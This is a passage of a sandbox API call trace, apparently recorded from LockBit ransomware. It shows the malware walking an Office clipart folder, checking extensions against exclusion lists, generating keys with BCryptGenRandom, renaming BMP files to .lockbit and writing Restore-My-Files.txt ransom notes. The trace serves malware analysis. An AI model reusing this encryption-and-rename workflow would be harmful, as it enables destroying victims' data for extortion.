returned 1 [0172.433] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0172.433] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0172.433] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0172.433] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0172.434] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0172.434] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0172.434] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0172.434] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0172.434] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0172.434] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0172.434] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0172.434] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0172.434] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0172.434] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0172.434] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0172.434] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0172.434] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0172.434] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0172.434] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0172.434] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0172.434] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0172.434] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0172.434] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0172.434] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0172.434] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0172.434] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0172.434] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02756U.BMP") returned 1 [0172.434] lstrcmpiW (lpString1="ntldr", lpString2="PH02756U.BMP") returned -1 [0172.434] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02756U.BMP") returned -1 [0172.434] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02756U.BMP") returned -1 [0172.434] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02756U.BMP") returned -1 [0172.434] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02756U.BMP") returned 1 [0172.434] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02756U.BMP") returned -1 [0172.435] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0172.435] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02756U.BMP") returned=".BMP" [0172.435] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0172.435] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0172.435] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0172.435] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0172.435] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0172.435] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0172.435] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0172.435] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0172.435] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0172.435] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0172.435] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0172.435] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0172.435] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0172.435] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0172.435] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0172.435] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0172.435] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0172.435] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0172.435] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0172.435] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0172.435] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0172.435] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0172.435] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0172.435] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0172.435] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0172.436] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0172.436] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0172.436] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0172.436] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02756U.BMP.lockbit") returned 72 [0172.436] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02756U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02756u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0172.438] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0172.439] malloc (_Size=0x40068) returned 0x3df0008 [0172.439] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=197640) returned 1 [0172.439] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.439] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0172.439] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.440] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0172.440] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0172.441] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02756U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02756U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0172.441] malloc (_Size=0xa6) returned 0x1fa2ed8 [0172.441] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0172.443] free (_Block=0x1fa2ed8) [0172.443] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02756U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0172.443] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0172.443] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0172.443] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe684b00, ftCreationTime.dwHighDateTime=0x1bd4e53, ftLastAccessTime.dwLowDateTime=0x6cebbbb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbe684b00, ftLastWriteTime.dwHighDateTime=0x1bd4e53, nFileSizeHigh=0x0, nFileSizeLow=0x30408, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02757U.BMP", cAlternateFileName="")) returned 1 [0172.443] lstrcmpiW (lpString1=".", lpString2="PH02757U.BMP") returned -1 [0172.443] lstrcmpiW (lpString1="..", lpString2="PH02757U.BMP") returned -1 [0172.443] PathFindExtensionW (pszPath="PH02757U.BMP") returned=".BMP" [0172.443] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0172.443] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0172.443] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0172.443] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0172.443] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0172.443] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0172.443] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0172.443] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0172.443] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0172.443] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0172.443] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0172.444] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0172.444] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0172.444] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0172.444] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0172.444] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0172.444] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0172.444] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0172.444] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0172.444] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0172.444] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0172.444] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0172.444] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0172.444] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0172.444] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0172.444] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0172.444] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0172.444] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0172.444] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0172.444] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0172.444] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0172.444] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0172.444] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0172.444] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0172.444] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0172.444] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0172.445] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0172.445] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0172.445] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0172.445] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0172.445] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0172.445] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0172.445] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0172.445] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0172.445] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0172.445] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0172.445] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0172.445] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02757U.BMP") returned 1 [0172.445] lstrcmpiW (lpString1="ntldr", lpString2="PH02757U.BMP") returned -1 [0172.445] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02757U.BMP") returned -1 [0172.445] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02757U.BMP") returned -1 [0172.445] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02757U.BMP") returned -1 [0172.445] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02757U.BMP") returned 1 [0172.445] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02757U.BMP") returned -1 [0172.445] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0172.445] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02757U.BMP") returned=".BMP" [0172.445] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0172.445] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0172.445] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0172.445] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0172.446] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0172.446] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0172.446] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0172.446] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0172.446] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0172.446] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0172.446] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0172.446] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0172.446] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0172.446] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0172.446] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0172.446] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0172.446] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0172.446] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0172.446] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0172.446] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0172.446] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0172.446] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0172.446] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0172.446] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0172.446] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0172.446] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0172.446] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0172.446] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0172.446] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02757U.BMP.lockbit") returned 72 [0172.447] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02757U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02757u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0172.447] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0172.447] malloc (_Size=0x40068) returned 0x1ff1e60 [0172.447] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=197640) returned 1 [0172.448] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.448] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0172.448] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.449] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0172.449] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0172.504] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02757U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02757U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0172.504] malloc (_Size=0xa6) returned 0x1fa2ed8 [0172.504] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0172.505] free (_Block=0x1fa2ed8) [0172.505] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02757U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0172.506] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0172.506] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0172.506] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7c1f400, ftCreationTime.dwHighDateTime=0x1bd4e53, ftLastAccessTime.dwLowDateTime=0x6cebbbb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa7c1f400, ftLastWriteTime.dwHighDateTime=0x1bd4e53, nFileSizeHigh=0x0, nFileSizeLow=0x307f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02758U.BMP", cAlternateFileName="")) returned 1 [0172.506] lstrcmpiW (lpString1=".", lpString2="PH02758U.BMP") returned -1 [0172.506] lstrcmpiW (lpString1="..", lpString2="PH02758U.BMP") returned -1 [0172.506] PathFindExtensionW (pszPath="PH02758U.BMP") returned=".BMP" [0172.506] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0172.506] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0172.506] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0172.506] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0172.506] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0172.506] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0172.506] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0172.506] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0172.506] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0172.506] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0172.506] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0172.506] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0172.506] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0172.507] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0172.507] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0172.507] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0172.507] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0172.507] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0172.507] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0172.507] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0172.507] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0172.507] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0172.507] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0172.507] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0172.507] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0172.507] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0172.507] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0172.507] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0172.507] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0172.507] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0172.507] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0172.507] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0172.507] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0172.507] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0172.507] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0172.508] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0172.508] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0172.508] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0172.508] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0172.508] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0172.508] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0172.508] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0172.508] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0172.508] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0172.508] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0172.508] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0172.508] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0172.508] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02758U.BMP") returned 1 [0172.508] lstrcmpiW (lpString1="ntldr", lpString2="PH02758U.BMP") returned -1 [0172.508] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02758U.BMP") returned -1 [0172.508] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02758U.BMP") returned -1 [0172.508] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02758U.BMP") returned -1 [0172.508] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02758U.BMP") returned 1 [0172.508] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02758U.BMP") returned -1 [0172.508] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0172.508] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02758U.BMP") returned=".BMP" [0172.508] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0172.508] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0172.509] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0172.509] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0172.509] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0172.509] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0172.509] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0172.509] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0172.509] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0172.509] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0172.509] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0172.509] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0172.509] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0172.509] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0172.509] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0172.509] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0172.509] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0172.509] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0172.509] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0172.509] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0172.509] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0172.509] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0172.509] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0172.509] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0172.510] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0172.510] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0172.510] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0172.513] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0172.513] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02758U.BMP.lockbit") returned 72 [0172.513] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02758U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02758u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0172.514] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0172.514] malloc (_Size=0x40068) returned 0x3d70450 [0172.514] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=198648) returned 1 [0172.514] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.515] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.515] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0172.515] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.516] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0172.516] 